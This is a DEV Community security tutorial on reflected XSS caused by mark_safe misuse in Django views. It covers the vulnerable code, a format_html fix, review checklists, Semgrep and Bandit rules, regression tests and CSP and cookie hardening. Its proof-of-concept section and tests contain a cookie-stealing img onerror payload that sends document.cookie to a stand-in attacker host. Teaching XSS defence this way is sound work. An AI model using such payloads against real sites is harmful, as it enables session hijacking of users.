Stefan

Posted on May 11 • Originally published at codereviewlab.com

Real-World CVE XSS Exploit in Django Template Engine

#django #security #xss #python

Real-World CVE XSS Exploit in Django Template Engine

A Django app with autoescape enabled gets XSS. The team can't figure out how — the template engine is supposed to escape everything by default. What they missed: a single mark_safe() call in a view utility function, written three years ago to render "trusted" notification banners, now handles a code path that feeds in URL query parameters. The attacker sends a crafted link to a support rep, the rep clicks it while authenticated, and the session cookie is gone. This is the anatomy of that class of bug.

How the Django Template XSS Bug Works

The Django template engine escapes output by default. When a string flows from a Python view into a template variable, Django's autoescaping converts <, >, ", ', and & into their HTML entity equivalents before rendering. The protection breaks the moment a string is marked safe before tainted data reaches the template.

CVE-2021-45116 is a Django information-disclosure bug, but the underlying mechanism — SafeString propagation across template context — is exactly the class of issue we're describing. A more direct analogy is CVE-2020-13254 (invalid cache key bypass) where attacker-controlled values slipped through Django's safety assumptions. The pattern recurs: a SafeString created from trusted content gets concatenated or formatted with untrusted content, and because the result inherits the SafeString type, autoescaping never fires.

For advanced XSS exploitation techniques, the interesting part is not the payload itself — it's how SafeString behaves when it meets string concatenation.

Here's the vulnerable pattern:

# views.py
from django.utils.safestring import mark_safe
from django.shortcuts import render

def search_results(request):
    query = request.GET.get("q", "")

    # Original intent: wrap the query in a <strong> tag for display.
    # The developer assumed query was always plain text from a search box.
    # No one audited this when a new "deep link" feature started passing
    # HTML fragments through the q= parameter.
    highlighted = mark_safe(f"Results for: <strong>{query}</strong>")

    return render(request, "search.html", {"highlighted": highlighted})

<!-- search.html -->
{% load static %}
<!DOCTYPE html>
<html>
<body>
  <!-- autoescape is ON by default, but highlighted is already a SafeString.
       Django will not re-escape it. The SafeString contract says:
       "I promise this is already safe." That promise was broken in the view. -->
  <p>{{ highlighted }}</p>
</body>
</html>

mark_safe() returns a SafeString instance. When Django's template engine encounters a SafeString, it skips escaping entirely. The |safe filter does the same thing — it casts to SafeString at the template layer. Either way, if the string contains attacker-controlled content, you have reflected XSS.

The f"Results for: <strong>{query}</strong>" line is the failure point. The trusted HTML (<strong>) and the untrusted data (query) are concatenated inside an f-string before mark_safe() is applied. By the time mark_safe() wraps the result, the attacker's payload is already embedded in the string with no escape opportunity left.

Patching the Vulnerable Template Code

The fix is format_html(). It's Django's purpose-built function for composing HTML strings from mixed trusted and untrusted inputs: it escapes every positional and keyword argument while leaving the format string — which must be a literal you control — as-is.

# views.py — fixed
from django.utils.html import format_html, escape
from django.shortcuts import render

def search_results(request):
    query = request.GET.get("q", "")

    # format_html escapes every argument before interpolation.
    # The format string itself is a trusted literal, not user input.
    # If you need to compose more complex HTML, use format_html_join().
    highlighted = format_html("Results for: <strong>{}</strong>", query)

    return render(request, "search.html", {"highlighted": highlighted})

<!-- search.html — no changes needed; template stays the same.
     format_html() returns a SafeString, but one that was built safely.
     The template's autoescape handles any other context variables normally. -->
{% load static %}
<!DOCTYPE html>
<html>
<body>
  <p>{{ highlighted }}</p>
</body>
</html>

Before/after in one line:

# Before (vulnerable)
highlighted = mark_safe(f"Results for: <strong>{query}</strong>")

# After (safe)
highlighted = format_html("Results for: <strong>{}</strong>", query)

If you absolutely must escape a value manually — say you're building a helper that conditionally wraps content — use conditional_escape(), not escape(), because conditional_escape() is a no-op on already-safe strings, preventing double-escaping:

from django.utils.html import conditional_escape, format_html

def wrap_if_nonempty(value, tag="span"):
    # conditional_escape handles both str and SafeString inputs correctly.
    # Passing a SafeString to escape() would double-escape it.
    safe_value = conditional_escape(value)
    if not safe_value:
        return ""
    return format_html("<{tag}>{value}</{tag}>", tag=tag, value=safe_value)

The one tradeoff: format_html() only accepts positional or keyword arguments as the escapable slots. You cannot pass a list into it directly; for that, use format_html_join(). Teams sometimes reach back for mark_safe() when they need a loop, which opens the hole again.

Building the Proof-of-Concept Payload

Against the vulnerable view, the exploit is a single crafted URL. No authentication needed, no stored state, no interaction beyond the victim loading the link.

# Confirming raw reflection first — does the tag survive?
curl -s "http://localhost:8000/search/?q=<script>alert(1)</script>" | grep -i script

# Expected output from the vulnerable app:
# <p>Results for: <strong><script>alert(1)</script></strong></p>

For session theft, replace the script tag with an out-of-band exfiltration payload:

http://localhost:8000/search/?q=<img src=x onerror="fetch('https://attacker.example/c?d='+encodeURIComponent(document.cookie))">

The rendered DOM on the victim's browser:

<p>Results for: <strong><img src=x onerror="fetch('https://attacker.example/c?d='+encodeURIComponent(document.cookie))"></strong></p>

The src=x triggers an immediate load failure, which fires onerror synchronously. document.cookie at this point contains every non-HttpOnly cookie on the Django session domain. If SESSION_COOKIE_HTTPONLY = False (Django's default is True, but it gets disabled), the attacker gets the session ID in the exfil request's query string.

Understanding how XSS abuses browser storage is worth the time here — tokens stored in localStorage or non-HttpOnly cookies are fully readable by this payload with no additional tricks.

The impact scales with the victim's privilege level. If a support agent or admin loads this link, the attacker inherits their session. If the Django app uses django-allauth or a similar SSO integration, the blast radius extends to connected services.

Why Autoescape Alone Did Not Save You

Django's autoescape is an output encoding layer, not an input filter. It works by checking whether a string is an instance of SafeString before rendering. If it is, escaping is skipped. mark_safe(), the |safe filter, and direct SafeString() construction all produce instances that will pass through unescaped.

The propagation behavior is the part that surprises people:

String concatenation breaks the safety boundary. When you concatenate a SafeString with a plain str, the result is a plain str. Autoescape will fire on that result. But when you use an f-string or % formatting with a SafeString as the base, the result is a SafeString:

from django.utils.safestring import mark_safe

safe = mark_safe("<b>hello</b>")
user_input = "<script>alert(1)</script>"

# Case 1: plain concatenation -> str -> autoescape fires -> safe
result1 = safe + user_input
print(type(result1))  # <class 'str'> — autoescape will escape this

# Case 2: f-string with SafeString as format base -> SafeString -> no escape
result2 = mark_safe(f"{safe} {user_input}")
print(type(result2))  # <class 'django.utils.safestring.SafeString'> — NOT escaped

Case 2 is exactly the vulnerable pattern in the view above. The mark_safe() wraps the f-string result, not the individual pieces.

The |safe filter in templates is just as dangerous as mark_safe() in views. Reviewers often focus on Python files and miss:

<!-- This escapes nothing. attacker_value renders raw. -->
{{ attacker_value|safe }}

{% autoescape off %} blocks propagate into includes. If a base template or inclusion tag disables autoescape, every child template rendered inside that block inherits the off state. This is a common gotcha with legacy template hierarchies where someone disabled autoescape "temporarily" in a wrapper and never re-enabled it. Variables in {% include "partial.html" %} inside an {% autoescape off %} block will not be escaped even if the partial itself does not set autoescape explicitly.

Inclusion tags that return SafeString from Python bleed into the template context. A @register.simple_tag that returns a mark_safe() value bypasses autoescape entirely when rendered in the template, even with autoescape on.

Code Review Checklist for Django Templates

Every instance of mark_safe, |safe, SafeString, and {% autoescape off %} in a Django codebase is a security decision that needs a written justification. When reviewing a PR, treat any of these as requiring the same rigor as a direct SQL query.

Grep the entire repo in one pass:

# Surface all mark_safe, |safe, SafeString, autoescape off, and format_html
# usages in Python and HTML files. Pipe to less for review.
rg --type py --type html \
  -e 'mark_safe' \
  -e '\|safe' \
  -e 'SafeString' \
  -e 'autoescape off' \
  -e 'format_html' \
  --stats

For each hit, answer these questions before approving:

Is the input ever attacker-reachable? Trace the data back to its source. If it touches request.GET, request.POST, request.META, a database field populated from user input, or a third-party API, it is tainted.
If format_html is used, are all variable interpolations passed as arguments (not in the format string)? format_html("Hello, " + name) is still broken — the format string must be a literal.
If mark_safe is used, is this the only place that string can be created? If other code paths can produce the same variable, each one needs the same audit.
Does the {% autoescape off %} block have a documented reason? Add a comment inline: {# autoescape off: rendering pre-escaped HTML from email template builder — input validated at creation time #}.

The XSS code review guide on Code Review Lab has a full taint-tracking walkthrough that complements this checklist, especially for cases where data flows through multiple serialization layers before hitting the template.

Semgrep rule to add to your CI config:

# semgrep-rules/django-mark-safe.yml
rules:
  - id: django-mark-safe-with-request-data
    patterns:
      - pattern: mark_safe(...)
      - pattern-either:
          - pattern: mark_safe($REQUEST.GET.get(...))
          - pattern: mark_safe($REQUEST.POST.get(...))
          - pattern: mark_safe(f"...{$REQUEST.GET.get(...)}...")
    message: "mark_safe called with request-derived data — this is XSS."
    languages: [python]
    severity: ERROR

Detecting Regressions With Tests and CI

Static analysis catches patterns, but tests catch behavior. Add a test that sends a known XSS payload and asserts it was escaped in the response body.

# tests/test_xss_escaping.py
import pytest
from django.test import Client
from django.urls import reverse

@pytest.mark.django_db
class TestSearchXSSEscaping:
    def setup_method(self):
        self.client = Client()

    def test_script_tag_is_escaped_in_search_results(self):
        payload = "<script>alert(document.cookie)</script>"
        response = self.client.get(reverse("search_results"), {"q": payload})

        body = response.content.decode("utf-8")

        # The literal string must never appear — if it does, the browser executes it.
        assert "<script>" not in body, (
            "Raw <script> tag found in response — autoescape is broken."
        )
        # The escaped form must be present — proves the value was rendered, not dropped.
        assert "&lt;script&gt;" in body, (
            "&lt;script&gt; not found — value may have been silently dropped rather than escaped."
        )

    def test_img_onerror_payload_is_escaped(self):
        payload = '<img src=x onerror="fetch(\'//evil.example\')">'
        response = self.client.get(reverse("search_results"), {"q": payload})

        body = response.content.decode("utf-8")

        assert "onerror=" not in body
        assert "&lt;img" in body

    def test_safe_html_in_response_is_structured_correctly(self):
        # Sanity check: legitimate query still renders inside <strong> tags.
        response = self.client.get(reverse("search_results"), {"q": "hello world"})
        body = response.content.decode("utf-8")
        assert "<strong>hello world</strong>" in body

Run these in CI on every PR that touches views, templates, or template tags. If mark_safe is introduced in the diff, the test_script_tag_is_escaped_in_search_results test will catch the regression immediately — before it reaches staging.

Add Bandit to your pipeline for the Python-side check:

# bandit flags mark_safe calls; combine with the semgrep rule above
bandit -r . -t B703,B308 --severity-level medium

B308 specifically targets mark_safe usage. B703 covers Django's format_html misuse. Neither replaces taint analysis, but both are fast enough to run on every commit.

Hardening Beyond the Template Layer

Fixing the template is necessary but not sufficient. If another mark_safe slip lands in a codebase a year from now, you want defense layers that limit the damage.

Content Security Policy with nonces. A strict CSP blocks inline script execution even if an attacker injects a <script> tag. Configure Django with django-csp:

# settings.py
CSP_DEFAULT_SRC = ("'self'",)
CSP_SCRIPT_SRC = ("'self'", "'nonce-{nonce}'")  # nonce injected per-request by middleware
CSP_STYLE_SRC = ("'self'",)
CSP_IMG_SRC = ("'self'", "data:")
CSP_OBJECT_SRC = ("'none'",)
CSP_BASE_URI = ("'none'",)  # Blocks base tag injection for relative URL hijacking

A nonce-based CSP stops the <script> execution path. The onerror= payload in an <img> tag still fires because it's an event handler attribute, not a <script> tag — CSP stops inline scripts, not all event handlers unless you add unsafe-hashes or switch to a hash-based policy. Trusted Types (available in Chromium-based browsers) blocks DOM injection sinks directly and is worth evaluating if your audience is Chrome-heavy.

HttpOnly and SameSite cookies. Verify these in settings.py:

SESSION_COOKIE_HTTPONLY = True   # Blocks document.cookie access from JS
SESSION_COOKIE_SAMESITE = "Lax"  # Blocks cross-site request forgery vectors
CSRF_COOKIE_HTTPONLY = True
CSRF_COOKIE_SAMESITE = "Strict"

SameSite=Lax prevents the session cookie from being sent on cross-origin POST requests but still allows top-level navigations, which is what the attacker's crafted link relies on. SameSite=Strict is stronger but breaks OAuth redirect flows. Know which one your app can tolerate.

Trusted Types. Add the header alongside CSP:

Content-Security-Policy: require-trusted-types-for 'script';

Trusted Types turns DOM XSS sinks (innerHTML, document.write, etc.) into typed APIs. Untrusted string assignment to these sinks raises a TypeError in supported browsers, making the onerror fetch payload harder to chain into persistent DOM injection even if reflection happens.

These controls are not replacements for fixing the template layer. They are the net underneath the trapeze.

DEV Community

Real-World CVE XSS Exploit in Django Template Engine

Real-World CVE XSS Exploit in Django Template Engine

How the Django Template XSS Bug Works

Patching the Vulnerable Template Code

Building the Proof-of-Concept Payload

Why Autoescape Alone Did Not Save You

Code Review Checklist for Django Templates

Detecting Regressions With Tests and CI

Hardening Beyond the Template Layer

Further Reading

Top comments (0)